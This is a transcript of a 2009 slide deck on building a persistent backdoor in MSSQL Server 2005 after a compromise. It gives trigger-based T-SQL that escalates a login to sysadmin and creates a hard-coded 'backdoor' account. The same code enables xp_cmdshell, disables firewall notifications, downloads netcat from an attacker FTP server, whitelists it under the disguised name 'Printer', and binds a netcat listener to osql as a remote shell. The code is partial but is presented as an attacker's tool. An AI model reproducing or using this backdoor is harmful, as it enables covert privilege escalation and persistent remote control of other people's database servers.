MSSql server 2005 backdoor
Download
Report
Transcript MSSql server 2005 backdoor
MSSQL SERVER 2005
BACKDOOR
Duong Ngo
October 14, 2009
POST-EXPLOITATION
Got access to a MSSQL box? (SQL injection,
brute force…)
Privileges: sa / dbo / normal user
Got all data
Now what’s next??
Backdoors
Provide easier access to the compromised
box in the future
Type of backdoors:
OS backdoors (rootkits),
Web server backdoor ( PHPshell, CGITelnet..)
So how’s about Database Backdoor?? YES!
SQL Server 2005 Backdoor
We’ll create a backdoor based on SQLServer
Trigger.
What’s Trigger?
Database Trigger
Special kind of stored procedure that
executes automatically when a user attempts
the specified data-modification statement on
the specified table (UPDATE, DELETE,
INSERT..)
Trigger gets executed under the security
context of who caused trigger to fire!
EXAMPLE – Create trigger
Context: Normal User with Create Trigger permission:
CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR
INSERT, DELETE,UPDATE
AS
EXEC sp_addsrvrolemember @loginame ='Hacker',
@rolename = N'sysadmin‘
EXAMPLE – Trigger got fired
Context: sa (server admin)
sa> DELETE * FROM tblCustomers
RESULT??
User: “Hacker” now become sysadmin
What can we do with that?
Privilege escalation: normal user -> higher
role
Database backdoor
SQLServer Backdoor features:
- Execute subsequent commands if current user is 'sa‘
- Enable xp_cmdshell
- Create new login 'backdoor' and add it to sysadmin server
role.
- Disable firewall notification mode
- Add ftp to allowed programs list
- Get netcat from attacker ftp server
- Create a directory 'Backdoor_activated' in attacker ftp
server to let attacker knows whenever the backdoor has
been started.
- Open netcat in listen mode attached with sql command
line client Osql.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR
DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ;
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor',
@rolename =N'sysadmin'
--disable firewall notification mode
Exec master..xp_cmdshell 'netsh firewall set notifications disable‘
…..
Why DL_DATABASE_LEVEL_EVENTS
Because it consists of all below events:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW
ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION
ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE
DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION
DROP_EVENT_NOTIFICATION
….
….
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- After get netcat, add netcat to firewall’s allowedprogram list
SET @cmd = 'netsh firewall add allowedprogram program=' +
@localdir + '\'+ @fileget + ' name=Printer mode=ENABLE
scope=ALL profile=ALL'
Thank You
for listening!!